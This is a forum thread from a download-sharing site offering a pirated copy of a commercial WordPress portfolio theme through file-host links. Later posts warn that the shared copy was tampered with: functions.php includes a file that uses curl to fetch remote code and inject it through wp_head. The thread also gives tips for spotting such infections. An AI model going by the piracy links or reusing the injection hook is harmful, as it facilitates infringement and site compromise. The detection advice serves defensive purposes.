76.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-04-2012, 11:16 AM (This post was last modified: 11-11-2012 03:35 PM by vietguysvn.)
Post: #1
[GET] Folio Two v1.4 – ThemeForest WordPress Edition
Folio Two Wordpress theme is an advanced portfolio focused to creative freelancers and agencies, a practical and usable wordpress theme designed with HTML5 + CSS3 and using jQuery to enhance an awesome user experience.

This template is a powerful tool based on RESPONSIVE DESIGN , adaptive to any kind of device. The screen size will not be a problem to show your favorite works.

If you are a DRIBBBLE player/fan you can show your latest shots in a original and easy way.

Just select your best works and begins to show your talent!

[Image: 00-preview.jpg]

Sale page
Code:
http://themeforest.net/item/folio-two-wordpress-edition/2351272

Download
Code:
https://www.dropbox.com/s/h265p6908a9o855/folio-two_v1.4.rar
Code:
http://uploadmirrors.com/download/0OFFWNWB/folio-two.zip
or visit here to download more themes

Code:
http://themes.nnkl.org/folio-two/


Virus total Normalized URL:

Normalized URL: folio-two_v1.4.rar
Detection ratio: 0 / 31
Analysis date: 2012-11-04 01:14:38 UTC ( 0 minutes ago )

https://www.virustotal.com/url/eca32b3d7...351991387/
11-09-2012, 07:50 PM (This post was last modified: 11-09-2012 07:50 PM by simey69.)
Post: #2
RE:
THE ABOVE SHARE IS INFECTED
The theme has been tampered with and a wp_head injection infection added

I've cleaned it, safe version below:

Code:
http://uploadmirrors.com/download/0OFFWNWB/folio-two.zip
VT: Clean 0/43
Code:
https://www.virustotal.com/file/ef3c3a5a2953f495c0249fdd06b9a2fdb9ea4d5cbe7a014a913b8419c6170c1e/analysis/1352454470/

Cheers,
Si
11-10-2012, 12:53 PM (This post was last modified: 11-10-2012 12:58 PM by vietguysvn.)
Post: #3
RE:
really thanks simey69, wp_head is header.php ???? i check header.php in my file and your file. can't see any different in there.
can you share some exps how to know that file is infected, so i can fix it before share it
11-10-2012, 07:15 PM
Post: #4
RE:
Hi,

No, it injects code into part of the wp mechanism using the add_action('wp_head', ...) function call.

Typically the functions.php is attacked, either with the injection code or to include another file that has the injection code.

in this case, it's the including a file method, as the functions.php has this added:
Code:
include'includes/dribbble/class.php';

the file class.php then has the curl call routine and the wp_head injection, this fetches external code from another domain and injects it into the header part of your output to visitors

This may contain links, cpa scams and other malware/trojans/exploits

Cheers,
Si
11-10-2012, 08:36 PM (This post was last modified: 11-10-2012 09:02 PM by vietguysvn.)
Post: #5
RE:
Hi,
it that meant i can find another link to domains, or a part of injection code in file funtions.php or another folder. right?
Now, if i scan file zip in virus totals, it's possible to find that. Because, i have just rechecked my zip file (direct upload xxx.rar to virustotal, not link file like dropbox.com/xxxx.rar), it show same results with your safe version, but in includes/dribbble/ has class.php file.
SHA256: c4a3c9fd2e0fd8b3b90a634eaac8063581c0c6761054db275ac1675fc3ae7176
File name: folio-two_v1.4.rar
Detection ratio: 0 / 43
Analysis date: 2012-11-10 10:28:30 UTC ( 1 minute ago )

Simple way is check if has some files were created have time not same with another file in folder ( like almost file are 04/22/2012, one file is 10/13/2012 that file maybe not normal) right?

how can i check theme file to find injection code inside before share it, because scan file zip in virustotal is not enough. it not show that problem at class.php file like you :(
really thank for you help, simey 69
76.gif
11-10-2012, 10:01 PM
Post: #6
RE:
Hi,

Mostly always look for new files or recently changed files compared to the actual file date (these script kiddies usually infect and share the same or next day, so can be obvious that way)
- as you say, the rest of the files may look a lot older compared to the infected files.

When searching through, look for curl functions or includes
- they usually make the offsite code domain look like its linked to jquery in some way, don't be fooled by that
- it will usually look very similar to the code in that class.php file - curl functions and the wp_head later

Virustotal or other virus scanners ignore this type of infection, as it looks like genuine code

sometimes they will try to encode it, if you see encoded code amongst normal code, then treat it as a risk and decode it.

I'm working on a script scanner, but my time right now is so very short, but it is about 60% completed - it will scan for these annoying infections.

Cheers,
Si
11-11-2012, 03:49 AM
Post: #7
RE:
Error,loading work?




74.gif